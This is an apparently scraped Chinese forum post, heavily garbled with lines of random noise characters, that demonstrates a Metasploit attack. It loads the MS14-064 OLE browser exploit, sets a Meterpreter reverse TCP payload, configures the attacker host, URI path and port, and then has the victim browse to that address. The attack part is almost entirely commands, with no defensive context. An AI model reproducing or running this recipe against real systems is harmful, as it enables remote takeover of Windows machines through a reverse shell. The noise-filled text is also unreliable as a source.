+ Y2 W* e+ a I
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示' T }' {- d* Y/ }# M* y
1 g( q8 @! u- w# Y% O1 A
4 E% U% Z& C9 j: A 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
0 ]: a0 a/ ?- {
X" z3 L2 a4 L
6 J1 j3 \, V# q0 o1 `2 A 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
; `, e7 }1 h4 t# K4 q
; B( `& S6 E. n I9 D
& b3 G+ F# C7 H/ X. T" I
set AllowPowershellPrompt true
9 T- Q- K. ?0 K2 v
6 G2 z+ u! K$ N" o& `
3 Q: O7 F! ?8 }) l Set LHOST 192.168.0.109
' P/ {( q+ |4 W" [5 }6 }7 r/ R E0 Y
^4 A; A( u1 v4 q
& z) j& [ W c$ s# S5 [& v1 ] set SRVHOST 192.168.0.109
- L* {( P: ]) {5 _2 T: u8 ?* m
/ c2 }' y/ J1 F( q, Q8 E! D. U
: H0 Z* Y# N( n4 l o8 D
Set uripath share
+ A- `) E: R F
; S, ]2 P5 w& }2 l/ O
; E- P* }% h2 H5 E8 V8 c( ?% `3 Z
Set srvport 80
. i3 o4 u! v) E. ~' h9 [, }3 W
: p) b2 N7 n6 Z! G5 Z9 E2 k# K% F$ k! L/ n2 Q+ s
2 P9 o4 Y" M; i( p
+ B; Z: f% t; w2 v0 r; R' a5 @5 y9 V0 h7 j+ }
$ m3 x# ]/ h p' g* H( B
2 B' {: ?& p6 \
! y/ o7 Y* i' }& ` 3 G o) n N/ t+ ^# _1 l! R
9 C1 _+ d. J8 t' Y. P w1 n; F4 k) L6 I5 d" E1 m! ^9 t
$ {6 K5 c/ m. d
5 ~5 |$ {/ x# C, B+ v4 _
4 Q2 E3 I$ l* x+ e. s9 h
7 |$ `4 R. P* ^4 |# ?6 E# d' C
$ g# v0 x) C5 q! Y' j" }, u- c) N1 ]) o
下面我们来访问本地地址如图:
: h/ m' W" _1 V2 t8 c! h- ~
1 U3 T7 ?) U6 t5 K1 B5 K/ A0 |8 E4 A7 F. E, U) @
" B6 { t7 q' N) q
) o. h5 P& M# b" c L
, C8 ? ~9 ^- w+ i; q ; y: w# m( j5 M2 K, J
7 s$ k, K+ e: `- c. A9 |- V; w9 \
: Q* }3 S! U% b8 P
6 w( l: D3 B# j* s